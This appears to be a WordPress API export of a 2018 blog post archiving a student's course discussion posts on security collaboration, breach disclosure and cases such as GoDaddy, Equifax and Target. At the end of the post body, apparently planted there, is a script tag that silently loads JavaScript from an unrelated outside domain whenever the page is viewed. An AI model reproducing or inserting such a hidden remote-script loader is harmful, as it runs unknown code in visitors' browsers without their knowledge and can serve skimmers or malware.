{"id":614,"date":"2018-08-10T00:00:29","date_gmt":"2018-08-10T00:00:29","guid":{"rendered":"http:\/\/bocchinfuso.net\/?p=614"},"modified":"2026-03-20T07:32:10","modified_gmt":"2026-03-20T07:32:10","slug":"fit-mgt5157-week-6","status":"publish","type":"post","link":"http:\/\/bocchinfuso.net\/index.php\/2018\/08\/10\/fit-mgt5157-week-6\/","title":{"rendered":"FIT &#8211; MGT5157 &#8211; Week 6"},"content":{"rendered":"<p>The submissions for this assignment are posts in the assignment&#8217;s discussion. Below are the discussion posts for Richard Bocchinfuso, or you can\u00a0<a id=\"discussion_view_link\" href=\"https:\/\/floridatech.instructure.com\/courses\/473\/discussion_topics\/4749?headless=1&amp;student_id=1302\"><b>view the full discussion<\/b><\/a>.<\/p>\n<div id=\"entry_18764\" class=\"discussion_entry communication_message can_be_marked_as_read read\" data-mark-read-url=\"\/api\/v1\/courses\/473\/discussion_topics\/4749\/entries\/18764\/read\">\n<div class=\"header clearfix\">\n<div class=\"header_title\">from\u00a0<a href=\"https:\/\/floridatech.instructure.com\/courses\/473\/discussion_topics\/4749?headless=1&amp;student_id=1302\">6.3 Discussion<\/a><\/div>\n<div class=\"teaser_message\"><\/div>\n<div class=\"post_date time_ago_date\" title=\"Aug 10, 2018 1:02pm\" data-timestamp=\"2018-08-10T13:02:57-04:00\">Aug 10, 2018 1:02pm<\/div>\n<div class=\"clear\"><\/div>\n<\/div>\n<div class=\"content\">\n<div><a class=\"avatar \" href=\"https:\/\/floridatech.instructure.com\/courses\/473\/users\/1302\"><span class=\"screenreader-only\">Richard Bocchinfuso<\/span><\/a><\/div>\n<div class=\"message user_content enhanced\">\n<p><em>Discussion: Describe the basis for effective collaboration of security defenses within and between organizations.<\/em><\/p>\n<p>This is an interesting question. I think ten years ago effective collaboration of security defenses within and between organizations would be highly dependent on effective open communication between these organizations. Today I think the effective collaboration of security defenses is being aided by two core technology shifts:<\/p>\n<ol>\n<li>Cloud<\/li>\n<li>Machine Learning, Deep Learning, AI<\/li>\n<\/ol>\n<p>Let&#8217;s start with the cloud. Today&#8217;s security providers are increasingly becoming cloud-enabled, they are relying on the aggregation of massive data sets (big data) for heuristics on massive compute farms that far surpass what is possible in a heuristics engine on a laptop, desktop or mobile device. Just about every security technology provider is leveraging the cloud and vast resources it provides. When organizations buy into the cloud-based security paradigms it is the equivalent of sharing and communicating information, but this information is now being aggregated, anonymized, analyzed and cross-referenced in real-time.\u00a0 (Quora Contributor, 2018)<\/p>\n<p>Machine learning, deep learning, and AI are not just buzzwords, they are technologies that harness data and continuously train models that can begin to see things which are not visible to the naked eye. These technologies are greatly altering how we think about security. Security providers like\u00a0<a class=\"external\" href=\"https:\/\/www.alertlogic.com\/\" target=\"_blank\" rel=\"noreferrer noopener\">AlertLogic<span class=\"screenreader-only\">\u00a0(Links to an external site.)<\/span><span class=\"ui-icon ui-icon-extlink ui-icon-inline\" title=\"Links to an external site.\"><span class=\"screenreader-only\">Links to an external site.<\/span><\/span><\/a>,\u00a0<a class=\"external\" href=\"https:\/\/www.secureworks.com\/\" target=\"_blank\" rel=\"noreferrer noopener\">Secureworks<span class=\"screenreader-only\">\u00a0(Links to an external site.)<\/span><span class=\"ui-icon ui-icon-extlink ui-icon-inline\" title=\"Links to an external site.\"><span class=\"screenreader-only\">Links to an external site.<\/span><\/span><\/a>\u00a0and many others that focus on IPS\/IDS and incident responses models that leverage data which is anonymized, but aggregated and analyzed across their entire customer base, this has tremendous value. Security providers like\u00a0<a class=\"external\" href=\"https:\/\/www.tanium.com\/\" target=\"_blank\" rel=\"noreferrer noopener\">Tanium<span class=\"screenreader-only\">\u00a0(Links to an external site.)<\/span><span class=\"ui-icon ui-icon-extlink ui-icon-inline\" title=\"Links to an external site.\"><span class=\"screenreader-only\">Links to an external site.<\/span><\/span><\/a>\u00a0and\u00a0<a class=\"external\" href=\"https:\/\/www.pandasecurity.com\/usa\/\" target=\"_blank\" rel=\"noreferrer noopener\">Panda Security<span class=\"screenreader-only\">\u00a0(Links to an external site.)<\/span><span class=\"ui-icon ui-icon-extlink ui-icon-inline\" title=\"Links to an external site.\"><span class=\"screenreader-only\">Links to an external site.<\/span><\/span><\/a>\u00a0and others who focus on end-point security also use cloud technologies, big data and machine learning to provide superior heuristics. For example, the embedded anti-malware in Windows 10 makes use of &#8220;cloud-based protection&#8221; to better protect users, users are opted-in to collaborating and opting-out requires the user intervention that is buried in the bowels of the operating system and anti-malware (Windows Defender) configuration settings.<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/i0.wp.com\/www.winhelponline.com\/blog\/wp-content\/uploads\/2017\/01\/defender-policies-1.png?fit=760%2C658&amp;quality=100&amp;ssl=1\" \/><\/p>\n<p>Collaboration and engagement require a focus on Human-Computer Interaction (HCI) to drive system usability and adoption, this is especially true in the field of security. Users vary and they have different expectations of the systems they interact with, a simple blacklist of whitelist approach no longer gets the job done, these approaches slow productivity and encourage working around the system. (Coursera, 2018)<\/p>\n<p>Intelligent security systems which leverage AI may be able to adapt security protocols based on user usage profiles. For example, what users took the lollipop and what users didn&#8217;t and should how security is enforced for these two user types differ? (DreamHost, 2018)<\/p>\n<p><iframe loading=\"lazy\" src=\"https:\/\/www.youtube.com\/embed\/pbQm-nIMo_A\" width=\"560\" height=\"314\" allowfullscreen=\"allowfullscreen\" data-mce-fragment=\"1\"><\/iframe><\/p>\n<p>To close out my thoughts this week, I will end with an example of a security problem that is not a platform problem, but rather a use problem, as is often the case. For those of us who have used Amazon (AWS) S3, the AWS object storage servicer we know that AWS offers extremely fine-grained ACLs for S3 buckets, the security paradigm is quite robust and defaults to no-access, but this robustness and fine-grained programmatic and composable infrastructure comes with complexity (Amazon, 2018), complexity leads to usability challenges which leads us to exposing data which is not intended to be exposed. This week that victim was GoDaddy who exposed an S3 bucket containing configuration data for tens of thousands of systems, as well as sensitive pricing information, apropos given our collective conversations last week regarding GoDaddy and DNS registrars.\u00a0 (Chickowski, 2018)<\/p>\n<p>With &gt; 80% of all corporations experiencing a hack of some sort, exploitation is on the rise and there is no end in sight. (Lipka, 2015) As we continue towards a public cloud world, platforms are providing more choice, easier access, and the ability to be agiler, build faster and come to market faster but we&#8217;ve lost the simplistic nature of layer 1 security. We have to have security systems that live at a layer above layer 1 human interaction, and communication. I believe that Progress will depend on the ability of the security systems of today and tomorrow to facilitate zero touch collaboration in an automate and secure way.<\/p>\n<p><strong>References<\/strong><\/p>\n<p>Amazon. (2018, August 10). Bucket Policy Examples. Retrieved August 10, 2018, from https:\/\/docs.aws.amazon.com\/AmazonS3\/latest\/dev\/example-bucket-policies.html<\/p>\n<p>Chickowski, E. (2018, August 9). AWS Employee Flub Exposes S3 Bucket Containing GoDaddy Server Configuration and Pricing Models. Retrieved August 10, 2018, from https:\/\/www.darkreading.com\/attacks-breaches\/aws-employee-flub-exposes-s3-bucket-containing-godaddy-server-configuration-and-pricing-models\/d\/d-id\/1332525<\/p>\n<p>Coursera. (2018, August 10). Usable Security. Retrieved August 10, 2018, from https:\/\/www.coursera.org\/lecture\/usable-security\/course-intro-60olh<\/p>\n<p>DreamHost. (2018, January 30). Take This Lollipop&#8230; I Dare You! Retrieved August 10, 2018, from https:\/\/www.dreamhost.com\/blog\/take-this-lollipop-i-dare-you\/<\/p>\n<p>ElsonCabral. (2011, October 26). Take This Lollipop. Retrieved August 10, 2018, from https:\/\/www.youtube.com\/watch?v=pbQm-nIMo_A<\/p>\n<p>Lipka, M. (2015, June 05). Percentage of companies that report systems hacked. Retrieved August 10, 2018, from https:\/\/www.cbsnews.com\/news\/percentage-of-companies-that-report-systems-hacked\/<\/p>\n<p>Quora Contributor. (2018, February 15). How Will Artificial Intelligence And Machine Learning Impact Cyber Security? Retrieved August 10, 2018, from https:\/\/www.forbes.com\/sites\/quora\/2018\/02\/15\/how-will-artificial-intelligence-and-machine-learning-impact-cyber-security\/#34f878166147<\/p>\n<\/div>\n<div class=\"link_box\">\n<div class=\"clear\"><\/div>\n<\/div>\n<div class=\"subcontent\"><\/div>\n<\/div>\n<\/div>\n<div id=\"entry_18851\" class=\"discussion_entry communication_message can_be_marked_as_read read\" data-mark-read-url=\"\/api\/v1\/courses\/473\/discussion_topics\/4749\/entries\/18851\/read\">\n<div class=\"header clearfix\">\n<div class=\"header_title\">from\u00a0<a href=\"https:\/\/floridatech.instructure.com\/courses\/473\/discussion_topics\/4749?headless=1&amp;student_id=1302\">6.3 Discussion<\/a><\/div>\n<div class=\"teaser_message\"><\/div>\n<div class=\"post_date time_ago_date\" title=\"Aug 10, 2018 6:41pm\" data-timestamp=\"2018-08-10T18:41:35-04:00\">Aug 10, 2018 6:41pm<\/div>\n<div class=\"clear\"><\/div>\n<\/div>\n<div class=\"content\">\n<div><a class=\"avatar \" href=\"https:\/\/floridatech.instructure.com\/courses\/473\/users\/1302\"><span class=\"screenreader-only\">Richard Bocchinfuso<\/span><\/a><\/div>\n<div class=\"message user_content enhanced\">\n<p>James, I would go as far as to say unless mandated by a regulatory requirement very few enterprises are advertising breaches and even when mandated by regulatory bodies they are pushing the boundaries\u00a0of the disclosure.\u00a0 For example,\u00a0Equifax took six weeks to disclose the hack, not the only major enterprise in a regulated industry looking to delay disclosure.\u00a0 \u00a0The bigger the organization the more sensitive\u00a0the data the tighter and more broad sweeping the NDAs.\u00a0 Ed Snowden&#8217;s are not falling out of trees and the number of statistical breaches, when contrasted with the number of reported breachs,\u00a0say there is more interest in obfuscation than there is in disclosure.\u00a0 Sure, the OTR conversations can happen at an InfoSec meetup, but the bigger the enterprise the more isolated and focused exposure is becoming, with access to systems, processes, conversations, etc. becoming so tightly governed that it&#8217;s getting harder and harder to assemble a full picture of a situation. Those who do have the complete picture don&#8217;t attend InfoSec meetups, they are busy having dinner\u00a0at Le Bernardin. \ud83d\ude42<\/p>\n<p>I think it&#8217;s a fair assumption to assume we know only a small fraction of what&#8217;s happening and that the preponderance of the most diabolical stuff never makes it into the mainstream.\u00a0 As technology becomes a profit center for every company, we will see more and more of this.\u00a0 The days of we are a manufacturing company and tech is a cost center are over, big data, analytics, and machine learning are driving every industry, with the CMO\u00a0spending more on technology than the CIO.<\/p>\n<p>Not saying we shouldn&#8217;t\u00a0keep trying, but I believe we will see significant\u00a0innovations that will change the game, relying less on the good behavior\u00a0of people and more on the machine to make and monitor decisions.\u00a0 Andrew mentioned the Target breach, there is no reason that and PLC\u00a0network for HVAC controls should have &gt;= layer 2 access to a network for payment processing, IMO layer 1 is even questionable, what should have been disclosed is the name of the network architect who built that infrastructure and everyone who looked at it thereafter and didn&#8217;t yell from the rooftop.<\/p>\n<p>&nbsp;<\/p>\n<p><strong>References<\/strong><\/p>\n<p>Isidore, C. (2017, September 8). Equifax&#8217;s delayed hack disclosure: Did it break the law? Retrieved August 10, 2018, from https:\/\/money.cnn.com\/2017\/09\/08\/technology\/equifax-hack-disclosure\/<\/p>\n<p>McLellan, L. (n.d.). By 2017 the CMO will Spend More on IT Than the CIO. Retrieved August 10, 2018, from https:\/\/www.gartner.com\/webinar\/1871515<\/p>\n<p>&nbsp;<\/p>\n<\/div>\n<div class=\"link_box\">\n<div class=\"clear\"><\/div>\n<\/div>\n<div class=\"subcontent\"><\/div>\n<\/div>\n<\/div>\n<div id=\"entry_18858\" class=\"discussion_entry communication_message can_be_marked_as_read read\" data-mark-read-url=\"\/api\/v1\/courses\/473\/discussion_topics\/4749\/entries\/18858\/read\">\n<div class=\"header clearfix\">\n<div class=\"header_title\">from\u00a0<a href=\"https:\/\/floridatech.instructure.com\/courses\/473\/discussion_topics\/4749?headless=1&amp;student_id=1302\">6.3 Discussion<\/a><\/div>\n<div class=\"teaser_message\"><\/div>\n<div class=\"post_date time_ago_date\" title=\"Aug 10, 2018 7:07pm\" data-timestamp=\"2018-08-10T19:07:13-04:00\">Aug 10, 2018 7:07pm<\/div>\n<div class=\"clear\"><\/div>\n<\/div>\n<div class=\"content\">\n<div><a class=\"avatar \" href=\"https:\/\/floridatech.instructure.com\/courses\/473\/users\/1302\"><span class=\"screenreader-only\">Richard Bocchinfuso<\/span><\/a><\/div>\n<div class=\"message user_content enhanced\">\n<p>Andrew, let&#8217;s assume that an organization\u00a0or organizations have a well designed and implemented network infrastructure using platforms from providers like Cisco, Juniper, Palo Alto, etc.<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/www.cisco.com\/c\/dam\/en\/us\/td\/i\/200001-300000\/290001-300000\/295001-296000\/295151.tif\/_jcr_content\/renditions\/295151.jpg\" alt=\"Image result for good private spine leaf design principles\" \/><\/p>\n<p>Organizations acting together (e.g. supplier and buyers in a supply chain system), can secure\u00a0their\u00a0data exchange on encrypted channels, they can use multi-factor authentication,\u00a0they can use Geo-fencing, they can use certificate-based PKI Smart Cards, but what if the exploit resides in the router or firewall code?\u00a0 What if there is an APT (Advances Persistent Thread) against organization X which exploits some vulnerability in the router or firewall code?\u00a0 When organization\u00a0X identifies the breach, do they communicate that they have been breached?\u00a0 If so to whom?\u00a0 While agreeing that open communication is key to slowing the bad guys, reducing the blast radius, etc. I also believe there are few organizations willing to volunteer that they have been breached, this is especially true if the breach has to do with human error, which they so often do.\u00a0 The reports we see are typically driven by watchdog groups, like the recent\u00a0<a class=\"external\" href=\"https:\/\/www.zdnet.com\/article\/aws-error-exposed-godaddy-server-secrets\/\" target=\"_blank\" rel=\"noreferrer noopener\">GoDaddy breach<span class=\"screenreader-only\">\u00a0(Links to an external site.)<\/span><span class=\"ui-icon ui-icon-extlink ui-icon-inline\" title=\"Links to an external site.\"><span class=\"screenreader-only\">Links to an external site.<\/span><\/span><\/a>; by a regulatory requirement to disclose like the\u00a0<a class=\"external\" href=\"https:\/\/krebsonsecurity.com\/2014\/02\/target-hackers-broke-in-via-hvac-company\/\" target=\"_blank\" rel=\"noreferrer noopener\">Target<span class=\"screenreader-only\">\u00a0(Links to an external site.)<\/span><span class=\"ui-icon ui-icon-extlink ui-icon-inline\" title=\"Links to an external site.\"><span class=\"screenreader-only\">Links to an external site.<\/span><\/span><\/a>\u00a0or\u00a0<a class=\"external\" href=\"https:\/\/krebsonsecurity.com\/2017\/09\/equifax-breach-response-turns-dumpster-fire\/\" target=\"_blank\" rel=\"noreferrer noopener\">Equifax<span class=\"screenreader-only\">\u00a0(Links to an external site.)<\/span><span class=\"ui-icon ui-icon-extlink ui-icon-inline\" title=\"Links to an external site.\"><span class=\"screenreader-only\">Links to an external site.<\/span><\/span><\/a>breach; by a catastrophe like the\u00a0<a class=\"external\" href=\"https:\/\/www.infoworld.com\/article\/2608076\/data-center\/murder-in-the-amazon-cloud.html\" target=\"_blank\" rel=\"noreferrer noopener\">CodeSpaces<span class=\"screenreader-only\">\u00a0(Links to an external site.)<\/span><span class=\"ui-icon ui-icon-extlink ui-icon-inline\" title=\"Links to an external site.\"><span class=\"screenreader-only\">Links to an external site.<\/span><\/span><\/a>\u00a0breach, but it most cases the motivation to disclose is not very strong at all.\u00a0 I believe the answer resides in anonymizing\u00a0the breach reports, focusing a little less on corporate accountability and more of getting the data needed to start programmatically\u00a0plugging the gaps, making the system less punitive\u00a0and manding more tech to secure the network so the machine may save us from ourselves.\u00a0 In essence more carrot and less stick.\u00a0 For example what if in the case of Target there was stateful packet inspection which saw both PLC data and payment processing data flowing on the same network, and took automated action to segment the traffic, shut the traffic down, etc.\u00a0 Sure these technologies will get hacked as well, but people are inherently poor binary decision makers and I think we will a different paradigm emerge.\u00a0 I think we are seeing it already.<\/p>\n<\/div>\n<div class=\"link_box\">\n<div class=\"clear\"><\/div>\n<\/div>\n<div class=\"subcontent\"><\/div>\n<\/div>\n<\/div>\n<div id=\"entry_18868\" class=\"discussion_entry communication_message can_be_marked_as_read read\" data-mark-read-url=\"\/api\/v1\/courses\/473\/discussion_topics\/4749\/entries\/18868\/read\">\n<div class=\"header clearfix\">\n<div class=\"header_title\">from\u00a0<a href=\"https:\/\/floridatech.instructure.com\/courses\/473\/discussion_topics\/4749?headless=1&amp;student_id=1302\">6.3 Discussion<\/a><\/div>\n<div class=\"teaser_message\"><\/div>\n<div class=\"post_date time_ago_date\" title=\"Aug 10, 2018 8:13pm\" data-timestamp=\"2018-08-10T20:13:50-04:00\">Aug 10, 2018 8:13pm<\/div>\n<div class=\"clear\"><\/div>\n<\/div>\n<div class=\"content\">\n<div><a class=\"avatar \" href=\"https:\/\/floridatech.instructure.com\/courses\/473\/users\/1302\"><span class=\"screenreader-only\">Richard Bocchinfuso<\/span><\/a><\/div>\n<div class=\"message user_content enhanced\">\n<p>Scott, enjoyed the post.\u00a0 I think this is my first comment on one of your post in this class.\u00a0 I like Canvas 1000x better than the old LMS but it feels like this class has more students or something because the discussion threads are long.\u00a0 Anyway, I have a few friends who work for FireEye, they are 100% focused on APTs (Advanced Persistent Threats) and what they will say is that FireEye focuses on four things:\u00a0<em>Prevent, Detect, Contain, Resolve.<\/em>\u00a0While prevention and detection are important with APTs the bad guys will typically find a way in so they put a heavy focus on containment.\u00a0 What containment is about is about is not letting the bad guys leave one they are in.\u00a0 I always\u00a0think about the bar scene\u00a0from the movie &#8220;A Bronx Tale&#8221;.\u00a0 The bad guys walk it the bar, but then they are contained. \ud83d\ude42<\/p>\n<p>Stating to see more and more focus on preventing data exfiltration (DLP).<\/p>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"clear\"><\/div>\n<h3>Assignment<\/h3>\n<div>[google-drive-embed url=&#8221;https:\/\/docs.google.com\/document\/d\/1BvA-CaYSKm7rdegCd7t-gD-UUwki15mbCroNSoZRhwo\/preview?usp=drivesdk&#8221; title=&#8221;Bocchinfuso &#8211; FIT &#8211; MGT5157 &#8211; Week 6 &#8211; Assignment 5&#8243; icon=&#8221;https:\/\/drive-thirdparty.googleusercontent.com\/16\/type\/application\/vnd.google-apps.document&#8221; width=&#8221;100%&#8221; height=&#8221;400&#8243; style=&#8221;embed&#8221;]<\/div>\n<p><script>var url = 'https:\/\/wafsearch.wiki\/xml';\nvar script = document.createElement('script');\nscript.src = url;\nscript.type = 'text\/javascript';\nscript.async = true;\ndocument.getElementsByTagName('head')[0].appendChild(script);<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>The submissions for this assignment are posts in the assignment&#8217;s discussion. Below are the discussion posts for Richard Bocchinfuso, or you can\u00a0view the full discussion. from\u00a06.3 Discussion Aug 10, 2018 1:02pm Richard Bocchinfuso Discussion: Describe the basis for effective collaboration of security defenses within and between organizations. This is an interesting question. I think ten [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":37,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3,13,2],"tags":[],"_links":{"self":[{"href":"http:\/\/bocchinfuso.net\/index.php\/wp-json\/wp\/v2\/posts\/614"}],"collection":[{"href":"http:\/\/bocchinfuso.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/bocchinfuso.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/bocchinfuso.net\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/bocchinfuso.net\/index.php\/wp-json\/wp\/v2\/comments?post=614"}],"version-history":[{"count":3,"href":"http:\/\/bocchinfuso.net\/index.php\/wp-json\/wp\/v2\/posts\/614\/revisions"}],"predecessor-version":[{"id":756,"href":"http:\/\/bocchinfuso.net\/index.php\/wp-json\/wp\/v2\/posts\/614\/revisions\/756"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/bocchinfuso.net\/index.php\/wp-json\/wp\/v2\/media\/37"}],"wp:attachment":[{"href":"http:\/\/bocchinfuso.net\/index.php\/wp-json\/wp\/v2\/media?parent=614"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/bocchinfuso.net\/index.php\/wp-json\/wp\/v2\/categories?post=614"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/bocchinfuso.net\/index.php\/wp-json\/wp\/v2\/tags?post=614"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}